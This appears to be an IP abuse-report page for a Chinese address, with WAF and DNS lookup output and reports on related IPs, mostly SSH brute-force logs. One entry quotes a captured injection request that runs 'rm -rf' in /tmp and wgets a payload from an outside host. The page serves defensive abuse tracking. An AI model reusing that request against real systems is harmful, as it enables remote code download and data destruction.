Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: ChinaNet Jiangsu Province Network

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
Type Details Datetime
attackspambots
The IP has triggered Cloudflare WAF. CF-Ray: 54139d5ea8a2e794 | WAF_Rule_ID: 3b40188685924a32bf11d40edea05a27 | WAF_Kind: firewall | CF_Action: challenge | Country: CN | CF_IPClass: noRecord | Protocol: HTTP/2 | Method: GET | Host: api.skk.moe | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15 | CF_DC: LAX. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/SukkaW/Cloudflare-WAF-to-AbuseIPDB).
2019-12-08 05:11:10
Comments on same subnet:
IP Type Details Datetime
49.66.177.177 attackspam
Port scan on 1 port(s): 15198
2020-05-12 06:54:37
Whois info:
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 49.66.17.220
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 2254
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;49.66.17.220.			IN	A

;; AUTHORITY SECTION:
.			408	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019120701 1800 900 604800 86400

;; Query time: 116 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Dec 08 05:11:07 CST 2019
;; MSG SIZE  rcvd: 116
Host info
Host 220.17.66.49.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 220.17.66.49.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
140.143.187.21 attackbotsspam
Lines containing failures of 140.143.187.21
Oct  5 05:52:52 jarvis sshd[3257]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.187.21  user=r.r
Oct  5 05:52:54 jarvis sshd[3257]: Failed password for r.r from 140.143.187.21 port 49314 ssh2
Oct  5 05:52:56 jarvis sshd[3257]: Received disconnect from 140.143.187.21 port 49314:11: Bye Bye [preauth]
Oct  5 05:52:56 jarvis sshd[3257]: Disconnected from authenticating user r.r 140.143.187.21 port 49314 [preauth]
Oct  5 06:13:33 jarvis sshd[4305]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.187.21  user=r.r
Oct  5 06:13:35 jarvis sshd[4305]: Failed password for r.r from 140.143.187.21 port 49000 ssh2
Oct  5 06:13:37 jarvis sshd[4305]: Received disconnect from 140.143.187.21 port 49000:11: Bye Bye [preauth]
Oct  5 06:13:37 jarvis sshd[4305]: Disconnected from authenticating user r.r 140.143.187.21 port 49000 [preauth]
Oct  5 06:18:........
------------------------------
2020-10-07 18:15:35
189.125.93.48 attackspambots
189.125.93.48 (BR/Brazil/-), 6 distributed sshd attacks on account [root] in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_DISTATTACK; Logs: Oct  7 02:24:38 server5 sshd[17215]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.125.93.48  user=root
Oct  7 02:24:40 server5 sshd[17215]: Failed password for root from 189.125.93.48 port 50606 ssh2
Oct  7 02:24:28 server5 sshd[16963]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=64.227.0.92  user=root
Oct  7 02:24:30 server5 sshd[16963]: Failed password for root from 64.227.0.92 port 35944 ssh2
Oct  7 02:24:19 server5 sshd[16854]: Failed password for root from 220.132.75.140 port 52846 ssh2
Oct  7 02:25:30 server5 sshd[17373]: Failed password for root from 45.55.182.232 port 53090 ssh2

IP Addresses Blocked:
2020-10-07 18:44:30
203.109.82.44 attack
Oct  7 11:52:03 server sshd[6940]: Failed password for root from 203.109.82.44 port 46932 ssh2
Oct  7 11:57:01 server sshd[8197]: Failed password for root from 203.109.82.44 port 56052 ssh2
Oct  7 12:02:06 server sshd[9299]: Failed password for root from 203.109.82.44 port 36988 ssh2
2020-10-07 18:40:35
220.186.149.82 attack
Banned for a week because of repeated abuses, for example SSH, but not only
2020-10-07 18:34:19
106.75.217.16 attackbotsspam
Attempted connection to port 4243.
2020-10-07 18:16:49
123.8.250.193 attackspambots
GET /shell?cd+/tmp;rm+-rf+*;wget+http://123.8.250.193:51862/Moz
2020-10-07 18:29:24
114.204.218.154 attack
Oct  7 12:00:34 PorscheCustomer sshd[26419]: Failed password for root from 114.204.218.154 port 45305 ssh2
Oct  7 12:04:32 PorscheCustomer sshd[26554]: Failed password for root from 114.204.218.154 port 47290 ssh2
...
2020-10-07 18:17:48
112.85.42.172 attackbotsspam
Oct  7 12:25:17 melroy-server sshd[27529]: Failed password for root from 112.85.42.172 port 37134 ssh2
Oct  7 12:25:21 melroy-server sshd[27529]: Failed password for root from 112.85.42.172 port 37134 ssh2
...
2020-10-07 18:25:47
63.41.9.207 attack
Oct  6 22:30:44 s2 sshd[29082]: Failed password for root from 63.41.9.207 port 35822 ssh2
Oct  6 22:38:21 s2 sshd[29500]: Failed password for root from 63.41.9.207 port 54629 ssh2
2020-10-07 18:46:34
112.85.42.112 attack
Oct  7 12:32:38 nopemail auth.info sshd[20416]: Unable to negotiate with 112.85.42.112 port 37368: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth]
...
2020-10-07 18:39:40
109.228.37.115 attackbotsspam
Brute forcing email accounts
2020-10-07 18:11:50
66.49.131.65 attackspam
2020-10-06 UTC: (41x) - root(41x)
2020-10-07 18:20:13
157.245.163.0 attackspam
TCP port : 26894
2020-10-07 18:36:18
117.35.118.42 attackspam
2020-10-07T06:56:57.949935mail.standpoint.com.ua sshd[15707]: Invalid user #Edcxsw2 from 117.35.118.42 port 58226
2020-10-07T06:56:57.954043mail.standpoint.com.ua sshd[15707]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.35.118.42
2020-10-07T06:56:57.949935mail.standpoint.com.ua sshd[15707]: Invalid user #Edcxsw2 from 117.35.118.42 port 58226
2020-10-07T06:56:59.931322mail.standpoint.com.ua sshd[15707]: Failed password for invalid user #Edcxsw2 from 117.35.118.42 port 58226 ssh2
2020-10-07T06:59:31.629198mail.standpoint.com.ua sshd[16044]: Invalid user !QAZ2wsx#EDC4rfv from 117.35.118.42 port 37996
...
2020-10-07 18:08:37
218.108.186.218 attackbots
SSH invalid-user multiple login try
2020-10-07 18:20:29
